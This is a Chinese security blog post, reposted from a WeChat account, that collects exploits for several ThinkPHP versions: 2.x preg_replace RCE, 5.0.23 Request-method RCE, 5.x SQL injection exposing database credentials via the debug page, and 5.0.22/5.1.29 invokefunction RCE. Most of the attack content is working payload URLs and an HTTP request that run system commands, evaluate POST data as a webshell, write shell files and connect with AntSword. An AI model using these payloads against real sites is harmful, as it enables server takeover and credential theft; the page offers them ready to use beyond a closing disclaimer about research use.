【攻防实战】ThinkPHP-RCE集锦

admin 2025年6月2日01:36:55评论14 views字数 1706阅读5分41秒阅读模式

善恶终有报,天道好轮回;不信抬头看,苍天饶过谁

ThinkPHP 2.x RCE漏洞

0、漏洞描述

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['\1']="\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

1、查询phpinfo()

/index.php?s=/index/index/xxx/${phpinfo()}
【攻防实战】ThinkPHP-RCE集锦

2、任意代码执行

index.php?s=/index/index/xxx/${system(whoami)}
【攻防实战】ThinkPHP-RCE集锦

3、Getshell

/index.php/module/action/param1/$%7B@print(eval($_POST['1']))%7D
【攻防实战】ThinkPHP-RCE集锦

蚁剑连接:

【攻防实战】ThinkPHP-RCE集锦

ThinkPHP5 5.0.23 RCE漏洞

0、漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

1、成功执行id命令

发送数据包:

POST /index.php?s=captcha HTTP/1.1
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
【攻防实战】ThinkPHP-RCE集锦

2、工具验证

【攻防实战】ThinkPHP-RCE集锦

ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

0、漏洞原理

漏洞原理说明:

传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。

1、SQL注入

信息成功被爆出:

/index.php?ids[0,updatexml(0,concat(0xa,user0),0)]=1
【攻防实战】ThinkPHP-RCE集锦

2、敏感信息泄露

通过DEBUG页面,找到了数据库的账号、密码:

/index.php?ids[0,updatexml(0,concat(0xa,user0),0)]=1
【攻防实战】ThinkPHP-RCE集锦

这属于一个敏感信息泄露漏洞。

3、工具验证

【攻防实战】ThinkPHP-RCE集锦

Thinkphp 5 5.0.22&5.1.29 RCE漏洞

0、漏洞概述

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1、执行phpinfo

/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
【攻防实战】ThinkPHP-RCE集锦

2、尝试执行系统命令

/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
【攻防实战】ThinkPHP-RCE集锦

3、写入shell文件

/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=......
【攻防实战】ThinkPHP-RCE集锦

蚁剑连接:

【攻防实战】ThinkPHP-RCE集锦

工具验证

【攻防实战】ThinkPHP-RCE集锦

攻防交流群

【攻防实战】ThinkPHP-RCE集锦

声明

文笔生疏,措辞浅薄,敬请各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(儒道易行):【攻防实战】ThinkPHP-RCE集锦

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月2日01:36:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【攻防实战】ThinkPHP-RCE集锦https://cn-sec.com/archives/4117908.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息